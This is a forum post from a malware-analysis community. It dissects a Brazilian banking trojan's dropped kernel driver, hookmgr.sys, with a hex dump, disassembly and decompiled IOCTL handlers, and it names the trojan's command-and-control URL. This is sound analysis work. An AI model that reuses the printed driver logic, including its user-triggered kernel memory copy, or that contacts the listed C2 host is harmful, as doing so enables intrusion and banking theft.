A forum for reverse engineering, OS internals and malware analysis 

WinNT/Banbra (Brazilian banker)

Forum for analysis and discussion about malware.

WinNT/Banbra (Brazilian banker)

 #27791  by unixfreaxjp
 Sun Jan 31, 2016 7:47 am
Hello @EP_X0FF

Someone sent me a binary to be investigated as a banking trojan with 37Mb size - the point is it installed the small windows driver and I don't know what is the purpose, except grabbing process ID (and its installation)
https://www.virustotal.com/en/file/57a2 ... 454211673/
https://www.virustotal.com/en/file/887b ... 454219912/
cnc is known (by behavior)
Code: Select all
contador.blackmagictwo.com/visualizar/fix.php (Brazil)
Has the big embedded data:
Image
The PE is a VB.NET the data extracted on the fly can be done in function:
Image
the one component extracted is small PE, a driver to be saved as hookmgr.sys
VT: https://www.virustotal.com/en/file/e547 ... 454217852/
The part of the driver shows some obvious part:
Code: Select all
00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
---------------------------------------------------------------------------------------------
00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
---------------------------------------------------------------------------------------------
00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
---------------------------------------------------------------------------------------------
00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.1385.1\inc\ddk\wdm.h
00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
//////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
//////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
---------------------------------------------------------------------------------------------
00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
---------------------------------------------------------------------------------------------
00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Devices\hookmgr
00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
---------------------------------------------------------------------------------------------
00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
---------------------------------------------------------------------------------------------
00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
But must reversed for the other part, like this installation function:
Code: Select all
// The installation is reversed from entry point: 0x001403e -> 0x0011310
// it creates the hook manager device as driver
|       |   0x0001403e      8bff           mov edi, edi
|       |   0x00014040      55             push ebp
|       |   0x00014041      8bec           mov ebp, esp
|       |   0x00014043      e8bdffffff     call 0x14005
|       |   0x00014048      5d             pop ebp
\       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
                  ↓ ↓ ↓ ↓ ↓
|           0x00011310      8bff           mov edi, edi
|           0x00011312      55             push ebp
|           0x00011313      8bec           mov ebp, esp
|           0x00011315      83ec0c         sub esp, 0xc
|           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
|           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
|           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
|           0x00011329      50             push eax        ;  source
|           0x0001132a      6828300100     push 0x13028    ;  dest
|           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
|           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
|           0x00011338      51             push ecx       ; src
|           0x00011339      6830300100     push 0x13030   ; dest
|           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
|           0x00011344      6818300100     push 0x13018  ; Object Device (DeviceObject)
|           0x00011349      6a00           push 0        ; excl bit
|           0x0001134b      6a00           push 0        ; characteristic
|           0x0001134d      6a15           push 0x15     ; type
|           0x0001134f      6828300100     push 0x13028  ; name
|           0x00011354      6a00           push 0        ; extention
|           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
|           0x00011359      52             push edx      ; object
|           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
|           0x00011360      8945fc         mov dword [ebp-local_1], eax
|           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
|       ,=< 0x00011367      7c4a           jl 0x113b3
So far so good.
Image

But then I faced this weird case-switch which I don't t know what is the point:
Code: Select all
///////////////////////////////////
Driver switches for actions
//////////////////////////////////
fn.0x011070 ;;
int ({eax}, int[var_loc], PIRP Irp)
{
  ULONG_PTR  [sp-0x010] [bp-254]
  ULONG_PTR  [sp+0x22C] [bp-18]
  ULONG_PTR  [sp+0x23C] [bp-8]
 
  char var0x01 = [sp+0x00C] [bp-0x0238]
  char var0x02 = [sp+0x004] [bp-0x0240]
  char var0x04 = [sp+0x22C] [bp-0x018h]
 
  var0x02 = *(_BYTE *)0x12B0(Irp);  
  if ( var0x02 == 14 )
  {
    switch ( {*(_DWORD *)(v9 + 12);} )
    {
/////////////////////////
      case 0x224004:
////////////////////////
        if ( v8 < 0xC )
        {
          var0x01 = -0xERR;
        }
        else
        {
          {-2} = 0;
          ProbeForWrite(*(PVOID *)&{Irp->AssociatedIrp.MasterIrp;}->Type, {Irp->AssociatedIrp.MasterIrp;}->Flags, 1u);
          memcpy(*(void **)&v11->Type, v11->MdlAddress, v11->Flags);
          var0x01 = 0;
          {-2} = -2;
        }
        break;
 
////////////////////////
      case 0x22400C:
////////////////////////
        if ( !DWORD-0x1301C )
          DWORD-0x1301C = (int)0x01010();
        if ( DWORD-0x1301C )
        {
          *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x1301C;
          Irp->IoStatus.Information = 4;
          var0x01 = 0;
        }
        else
        {
          var0x01 = -0xERR;
        }
        break;
 
/////////////////////////
      case 0x224014:
////////////////////////
        if ( !DWORD-0x13020 )
          DWORD-0x13020 = (int)0x11040();
        if ( DWORD-0x13020 )
        {
          *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x13020;
          Irp->IoStatus.Information = 4;
          var0x01 = 0;
        }
        else
        {
          var0x01 = -0xERR;
        }
        break;
 
////////////////////
      default:
////////////////////
        var0x01 = -0xERR;
        break;
    }
  }
///////////////
  else
//////////////
  {
    var0x01 = 0;
  }
